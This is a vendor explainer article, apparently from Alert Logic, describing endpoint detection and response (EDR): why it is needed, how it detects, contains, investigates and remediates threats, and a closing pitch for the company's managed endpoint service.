Enterprise protection platforms (EPPs) are a foundational element of modern cybersecurity. These integrated solutions employ anti-malware to detect and block malicious exploits on devices at the edge of the organization’s network. While they’re largely successful in stopping traditional threats, they’re unable to protect endpoints from the more sophisticated threats that are increasingly targeting businesses.
The concept of endpoint detection and response (EDR) has arisen to address these advanced threats. EDR not only detects stealthy malware and threat actors, but it also provides insight into how they got into the network, what they’re doing in it, and how to stop and remove them.
[Related Reading: MDR. vs. EDR]
Why you need EDR
Organizations are challenged with defending an ever-expanding attack surface. The term “attack surface” refers to all the ways an attacker can get into an organization’s network and compromise sensitive data. Over the last decade or so, the attack surface has gotten bigger as the number of devices that connect to company networks has grown. Laptops and mobile devices — both company-issued and employees’ personal devices — routers and Wi-Fi access points, POS systems, and IoT devices are all now potential entry points into the corporate network. According to the SANS Endpoint Protection and Response Survey, 44 percent of IT teams manage between 5,000 and 500,000 endpoints.
The sheer number of devices virtually guarantees some percentage of them will harbor OS and application vulnerabilities at any given time. While antimalware protection has evolved to a point where it can catch the vast majority of malicious threats, it can’t stop everything. Fileless malware, for example, is a newer threat that can appear as a normally running process in the computer’s memory, thus avoiding malware signature scanners.
A weaker link than the devices themselves, though, is the people who use them. Humans are the target of sophisticated cyberattacks such as social engineering, which tricks users into opening phishing emails and clicking malicious links by appearing to be from a credible source such as a bank or a software update. Studies have repeatedly shown that human error is the primary diver of data breaches.
Humans are also a critical component of Advance Persistent Threats (APTs). These sophisticated attacks unfold over the long term, often months, in multiple stages, and they typically require accomplices on the inside of the organization. APTs are designed to extract the maximum amount of data possible while evading detection for as long as possible. A Ponemon Institute survey found it can take more than three months for a company to detect an APT once it’s inside the network.
To combat these threats, organizations need to have visibility into system activities and events that take place on the endpoints and be able to take appropriate action quickly. EDR solutions can monitor your endpoints for these and other modern threats that older antimalware products can’t detect.
How EDR Works
EDR can be thought of as a more intelligent antimalware. To better illustrate this, consider your home as the endpoint. Traditional antimalware could be likened to the lock on your front door. That lock would be sufficient to prevent entry by almost anyone who didn’t have a key. But no lock is foolproof. An intruder could still find a way in by picking the lock, kicking the door in, or convincing someone in your household to open the door by posing as a credible visitor such as a delivery person.
Adding additional security measures in the form of motion detectors and security cameras would be similar to adopting EDR. Motion detectors and cameras would provide greater visibility into your home, allowing you to monitor all points of entry including your windows, garage, and back door. They would alert you to any attempt to gain entry into your home, and even if an intruder succeeded, you would have the means to detect and identify the person. You’d also typically have the ability to review recorded footage of the event to determine exactly how the individual got in, what they did or took while in your home, and how to prevent similar events from happening in the future.
EDR provides similar capabilities for your endpoint devices. The vast majority of malicious threats will be detected and blocked from getting into the endpoint at all. For the attacks that manage to slip through, EDR monitors and logs all activity so you have total visibility and a complete record of what has occurred on the endpoint. This enables you to quickly identify security incidents and determine the remediation steps necessary to contain or remove the threat.
The components of EDR
Former Gartner analyst Anton Chuvakin initially classified the evolving endpoint protection tools and methods. In 2013, he coined a generic term for tools focused on detecting and investigating suspicious activities and other malicious issues on endpoints: Endpoint Threat Detection and Response (ETDR). In 2015, Gartner officially changed the reference to simply Endpoint Detection and Response, or EDR.
According to Gartner, there are four elements that must exist for something to be considered an EDR solution:
- Detect security incidents
- Contain the incident at the endpoint
- Investigate security incidents
- Provide remediation guidance
An effective EDR solution will contain all these components. Let’s look at each more closely.
EDR solutions work by using automated systems to detect threats before they can inflict damage. To do so, they install a software agent on each of your endpoints. The agent continuously monitors the endpoint, gathering and sending telemetry data to a central database, where it’s processed and analyzed for anomalies by machine learning algorithms. It then alerts analysts to any processes or user behaviors that deviate from normal so they can be investigated.
Because EDR relies on behavior analysis rather than signature-based detection, it can protect against threats that slip past more traditional systems, including zero-day viruses, file-less malware, multi-stage attacks, and insider threats.
Endpoint detection is only as good as the threat intelligence that informs it. Threat intelligence continuously gathers raw data on emerging or existing threats and threat actors and contextualizes it to ensure constant visibility into attack techniques, trends, and vulnerabilities. EDR detection will not be effective without relevant threat intelligence.
Once a threat has been identified, an EDR solution must contain it to prevent it from moving laterally within the network. This is done through an automated response that can block an individual process or network access, for example. Containment is especially critical with threats that infect multiple devices to quickly spread throughout the environment.
With the threat detected and contained, it’s examined to collect contextual information. This enables the security team to understand exactly what is happening and why. A user account accessing data on the weekend could indicate an insider threat or could just be an employee putting in extra hours to meet a looming project deadline.
If the event turns out to be a legitimate threat, investigating will help determine why it happened. Did the threat sneak through the endpoint because of an application vulnerability? Is it a new threat not documented in the threat intelligence? Does the endpoint’s OS need to be updated? Investigating the reason for the breach is essential to identifying security blind spots and preventing the same type of threat from occurring again and again.
Effective EDR solutions will be able to automatically act on confirmed threats. Responses to a threat can include anything from shutting down the processes on the infected endpoint to isolating the endpoint from the rest of the company network to removing the infection.
Remediation goes beyond neutralizing the compromised endpoint, though. Your IT team will have to team determine what, if any, data was stolen and what other parts of the network may have been involved and need remediation. An EDR solution should support this by providing the visibility to determine where the malicious threat originated, what data and applications it interacted with, and other details of the threat timeline to provide a complete record of the event. Ultimately, remediation should help you strengthen your overall network security.
EDR is essential protection
No organization can be completely immune to attacks in today’s aggressive threat environment. Cybersecurity must instead focus on rapid detection and response to reduce the likelihood and mitigate the damage of a successful attack. An EDR solution, ideally paired with an EPP, provides the strongest defense against exploits on your endpoint devices, allowing you to proactively find and stop attacks before they compromise your network.
Alert Logic Endpoint Security
With Alert Logic’s extended endpoint protection, organizations can monitor and isolate endpoint attacks at the earliest opportunity before any damage is done. Our managed detection and response platform can work alongside any existing antivirus tools to provide an additional layer of defense.